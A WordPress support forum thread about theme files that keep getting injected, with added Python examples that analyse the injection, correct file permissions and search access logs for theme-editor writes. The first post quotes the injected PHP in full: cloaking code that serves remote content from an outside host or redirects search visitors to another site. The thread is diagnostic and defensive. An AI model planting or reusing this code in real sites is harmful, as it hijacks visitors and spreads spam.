
Theme files keep getting injected with viral script (9 posts)

  1. lovablechelsey
    Posted 7 years ago #

    Hi there,

    I am pretty much stumped. One of my clients runs a WordPress blog and no matter what I do, I can't keep it from getting hacked. I've updated all the plugins, deleted all unnecessary-looking files from the server, he changes his FTP password once a week, yet he still keeps getting his files modified.

    It only happens in the theme folder, to either the index.php, header.php or footer.php files. This is the typical code that gets inserted:

    // Fires only when the visitor sent no Cookie header and the query string
    // starts with "abstract=" (a search click-through); the site owner rarely qualifies.
    if ( !getenv("HTTP_COOKIE") && preg_match( "/^abstract=(.+)/", getenv("QUERY_STRING"), $m) ) {
        $qs_kw = $m[1];
        preg_match("/([0-9]+).([0-9]+).([0-9]+).([0-9]+)/", getenv("REMOTE_ADDR"), $arr);
        $a = $arr[1]; $b = $arr[2]; // first two octets of the client address
        // First two octets of the listed networks, concatenated with no separator
        $lst = ',38100,189221,61135,220181,174132,66230,7455,66102,20880,20383,97116,89122,3899,66232,19347,66231,66228,66212,61247,67195,86,72240,7214,74125,66249,6468,64233,21633,216239,20985,209185,202212,202160,203141,216109,216239,21632,6475,66163,66196,66228,6694,68142,7230,69147,6555,746,208111,6428,';
        if ( preg_match( "/,$a$b,/", $lst) ) { // listed address: fetch attacker content and serve it inline
            $remfl = implode('', file ("http://u8i.org/frame_file.php?k=$qs_kw&pl=207&mt=r")); echo $remfl; exit;
        } else { // everyone else: JavaScript redirect to the attacker's site with keyword, URL and referrer
            $rf = getenv("HTTP_REFERER");
            echo "<script>document.location='http://www.crusadersafc.com/modules/xml/302.php?qq='+escape('$qs_kw')+'&fn='+escape(location.href)+'&dr='+escape('$rf')</script>"; exit;
        }
    }

    I'm wondering if it has to do with certain settings in his php.ini that I'm not catching. Anyone have any ideas?
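The branching of the injected code above, re-implemented in Python as an added example (not part of the original post) so the cloaking is easier to see. The octet list is copied from the $lst string in the post; the visitor addresses, cookies and query strings are constructed. The `ambiguous_entries` helper goes beyond the post and shows a side effect of gluing two octets together without a separator: some list entries match two different networks.

```python
import re

# The $lst value from the injected code above: for each network the attacker
# singles out, the first two octets concatenated with no separator between them.
RAW_LIST = (
    ",38100,189221,61135,220181,174132,66230,7455,66102,20880,20383,97116,89122,"
    "3899,66232,19347,66231,66228,66212,61247,67195,86,72240,7214,74125,66249,"
    "6468,64233,21633,216239,20985,209185,202212,202160,203141,216109,216239,"
    "21632,6475,66163,66196,66228,6694,68142,7230,69147,6555,746,208111,6428,"
)

# The PHP patterns reproduced as written, unescaped dots included, so the
# Python behaves exactly like the injected code does.
IPV4_RE = re.compile(r"([0-9]+).([0-9]+).([0-9]+).([0-9]+)")
KEYWORD_RE = re.compile(r"^abstract=(.+)")


def classify_visitor(http_cookie, query_string, remote_addr, lst=RAW_LIST):
    """Return which branch of the injected block a request would take.

    "clean"        - the block does nothing; the real page is served
    "remote_frame" - attacker content is fetched server-side and echoed in place of the page
    "js_redirect"  - a <script> that sends the browser to the attacker's URL is emitted
    """
    # Both trigger conditions must hold: no Cookie header at all, and a query
    # string that *starts with* abstract= (the PHP anchors with ^). A logged-in
    # owner always carries WordPress cookies, so they never see the payload.
    if http_cookie or not KEYWORD_RE.match(query_string or ""):
        return "clean"
    # Only the first two octets are used, glued together; if REMOTE_ADDR is not
    # dotted IPv4 the PHP ends up testing ",," which is never in the list.
    m = IPV4_RE.search(remote_addr or "")
    key = "," + (m.group(1) + m.group(2) if m else "") + ","
    return "remote_frame" if key in lst else "js_redirect"


def ambiguous_entries(lst=RAW_LIST):
    """Entries that more than one (first, second) octet pair can produce.

    Because the octets are concatenated without a separator, an entry such as
    "746" is hit by 7.46.x.x and 74.6.x.x alike, so the list covers more
    address space than its author probably intended.
    """
    result = {}
    for entry in filter(None, lst.split(",")):
        pairs = []
        for i in range(1, len(entry)):
            a, b = entry[:i], entry[i:]
            # a valid octet is 0-255 with no leading zero
            if all(str(int(x)) == x and int(x) <= 255 for x in (a, b)):
                pairs.append((a, b))
        if len(pairs) > 1:
            result[entry] = pairs
    return result


if __name__ == "__main__":
    # Constructed sample requests, not taken from the thread.
    samples = [
        ("", "abstract=cheap+pills", "66.249.71.12"),                         # address on the list
        ("", "abstract=cheap+pills", "198.51.100.7"),                         # ordinary search visitor
        ("wordpress_logged_in_x=1", "abstract=cheap+pills", "198.51.100.7"),  # site owner, has cookies
        ("", "p=42", "198.51.100.7"),                                         # direct visit, no trigger
    ]
    for cookie, qs, ip in samples:
        print(f"{ip:>15} cookie={bool(cookie)!s:5} qs={qs!r:24} -> {classify_visitor(cookie, qs, ip)}")
    print("ambiguous list entries:", ambiguous_entries())
```

This is why "no matter what I do" the owner sees a normal site: the payload only fires for a visitor with no cookies whose query string begins with abstract=. Requesting the page with the Cookie header stripped and `?abstract=anything` appended is enough to confirm an infection from the outside.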

  2. TransPersonal
    Posted 7 years ago #

    I don't know, but maybe using some security plugins would prevent the hacking: WP-Firewall (free, google it), AskApache Password Protect, Login LockDown, etc.

  3. Shane G
    Posted 7 years ago #

    Make sure that the themes and plugins you have installed on your blog are not vulnerable and are compatible with your host and blog configuration.

    Recursively assign 644 permissions to the theme directory of your blog.

    Shane G.

  4. lovablechelsey
    Posted 7 years ago #

    I tried setting the permissions on the themes directory to 644, but the CSS and images will not load unless the permissions are 755. Could that be the problem?
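An added example, not from the thread, on the permissions question in the two posts above. On Unix a directory needs the execute (search) bit for anything inside it to be opened, so 644 on a directory is what stops the CSS and images from loading; regular files need 644, directories 755. The script sets the two apart, refuses to follow symlinks, and lists world-writable entries, which are the ones a neighbour on a shared host could inject into. The theme tree it operates on is constructed in a temporary directory.

```python
import os
import shutil
import stat
import tempfile

DIR_MODE = 0o755   # rwxr-xr-x: the execute bit lets the web server open files inside
FILE_MODE = 0o644  # rw-r--r--: plain files need no execute bit


def fix_theme_permissions(path):
    """Recursively set 755 on directories and 644 on regular files.

    A directory's mode is corrected before it is listed, so this also repairs
    a tree that 644-on-directories has already locked. Symlinks are skipped so
    a link pointing out of the theme tree is never followed. Returns how many
    entries had their mode changed.
    """
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return 0
    is_dir = stat.S_ISDIR(st.st_mode)
    want = DIR_MODE if is_dir else FILE_MODE
    changed = 0
    if stat.S_IMODE(st.st_mode) != want:
        os.chmod(path, want)
        changed = 1
    if is_dir:
        for name in sorted(os.listdir(path)):
            changed += fix_theme_permissions(os.path.join(path, name))
    return changed


def world_writable(root):
    """Paths under root (relative to it) that any local user can overwrite."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, n) for n in filenames]:
            if os.lstat(path).st_mode & stat.S_IWOTH:
                found.append(os.path.relpath(path, root))
    return sorted(found)


def demo():
    """Build a constructed theme tree, break it the way the thread describes,
    repair it, and report what changed."""
    root = tempfile.mkdtemp(prefix="theme-")
    os.chmod(root, DIR_MODE)                          # mkdtemp creates the directory 0700
    images = os.path.join(root, "images")
    os.mkdir(images)
    os.chmod(images, DIR_MODE)
    for rel in ("index.php", "header.php", "footer.php", "style.css", "images/logo.png"):
        full = os.path.join(root, rel)
        with open(full, "w") as fh:
            fh.write("/* constructed sample file */\n")
        os.chmod(full, FILE_MODE)
    os.chmod(os.path.join(root, "footer.php"), 0o666)  # world-writable: an easy injection target
    before = world_writable(root)
    os.chmod(images, 0o644)                           # "644 recursively": images/ can no longer be traversed
    changed = fix_theme_permissions(root)
    after = world_writable(root)
    modes = {rel: oct(stat.S_IMODE(os.lstat(os.path.join(root, rel)).st_mode))
             for rel in ("images", "footer.php", "images/logo.png")}
    shutil.rmtree(root)
    return {"changed": changed, "before": before, "after": after, "modes": modes}


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

One caveat: file modes only restrict other local users. A write made through the web server's own PHP, such as the built-in theme editor, runs as the same user that owns the theme files and is not stopped by 644.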

  5. lovablechelsey
    Posted 7 years ago #

    How can I tell if a theme is vulnerable?

  6. lovablechelsey
    Posted 7 years ago #

    Just FYI in case anyone has the same problem:

    I downloaded the WordPress Firewall as suggested by TransPersonal from http://www.seoegghead.com/software/wordpress-firewall.seo and it works amazingly well. The site was getting "WordPress-Specific SQL Injection Attacks" and the firewall blocked them. Thanks!!!

  7. Inspired2Write
    Posted 7 years ago #

    Hi lovablechelsey,

    I'm in a similar boat to you. My site was also attacked with a script mentioned here by another member:

    Read the member's last post in that thread. The member stated that the script was hiding on their host's server, and until it was deleted from the server it resurfaced on that person's blog. Hope that might help, if the seoegghead plugin doesn't fix your challenge.

  8. esmi
    Forum Moderator
    Posted 7 years ago #

    Who is the site hosted with? If it's on a shared server, the weak link could be another site on the same server. Have you spoken to the hosting provider?

  9. lovablechelsey
    Posted 7 years ago #

    The WordPress Firewall showed that the attack was being made through wp-admin/theme-editor.php, so once I changed the WordPress administrator's password there have been no more attempts. Phew!
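The vector named in the post above, an administrator account used to save a theme file through wp-admin/theme-editor.php, leaves a distinctive trail in the web server's access log. As an added example (not from the thread), the script below parses combined-format log lines and pulls out the three events worth looking for: a successful login (WordPress answers a correct password with a 302, a wrong one re-renders the form with 200), a POST to the theme or plugin editor (a GET only displays the file; the save is the POST), and search visitors hitting the injected code's `abstract=` trigger. The log excerpt is constructed and uses documentation address ranges.

```python
import re
from collections import Counter

# Apache/nginx "combined" format: client, ident, user, [time],
# "method path protocol", status, bytes, "referer", "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Stock WordPress pages that write PHP to disk from the browser.
FILE_EDITORS = ("/wp-admin/theme-editor.php", "/wp-admin/plugin-editor.php")

# Constructed access-log excerpt (not from the thread): one failed and one
# successful login, the editor opened on footer.php, the save, a search visitor
# tripping the injected redirect, and an unrelated editor view from another address.
SAMPLE_LOG = """\
203.0.113.9 - - [14/Sep/2009:03:12:01 +0000] "POST /wp-login.php HTTP/1.1" 200 4113 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Sep/2009:03:12:07 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Sep/2009:03:12:15 +0000] "GET /wp-admin/theme-editor.php?file=footer.php&theme=default HTTP/1.1" 200 20311 "-" "Mozilla/5.0"
203.0.113.9 - - [14/Sep/2009:03:12:40 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "http://blog.example/wp-admin/theme-editor.php?file=footer.php&theme=default" "Mozilla/5.0"
198.51.100.4 - - [14/Sep/2009:08:01:02 +0000] "GET /?abstract=cheap+pills HTTP/1.1" 200 512 "http://www.google.com/search?q=cheap+pills" "Mozilla/4.0"
192.0.2.77 - - [14/Sep/2009:09:30:00 +0000] "GET /wp-admin/theme-editor.php?file=style.css&theme=default HTTP/1.1" 200 19877 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m:
            rec = m.groupdict()
            rec["path"], _, rec["query"] = rec["path"].partition("?")
            records.append(rec)
    return records


def file_editor_writes(records):
    """Requests that saved a file through the built-in editors (POST, not GET)."""
    return [r for r in records if r["method"] == "POST" and r["path"] in FILE_EDITORS]


def successful_logins(records):
    """Count of successful wp-login.php posts per client address (302 = accepted)."""
    return Counter(r["ip"] for r in records
                   if r["method"] == "POST" and r["path"] == "/wp-login.php" and r["status"] == "302")


def doorway_hits(records):
    """Requests whose query string satisfies the injected code's abstract= trigger."""
    return [r for r in records if r["query"].startswith("abstract=")]


if __name__ == "__main__":
    recs = parse(SAMPLE_LOG.splitlines())
    for r in file_editor_writes(recs):
        print(f"file saved via {r['path']} by {r['ip']} at {r['time']}")
    print("successful logins per address:", dict(successful_logins(recs)))
    print("doorway hits:", [(r["ip"], r["referer"]) for r in doorway_hits(recs)])
```

Run `parse()` over the real access log and look for a POST to theme-editor.php from an address that logged in shortly before and appears nowhere else in the log. Changing the password closes the door the attacker used; the editor itself can be switched off by adding `define('DISALLOW_FILE_EDIT', true);` to wp-config.php, which disables both the theme and plugin editors.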

Topic Closed
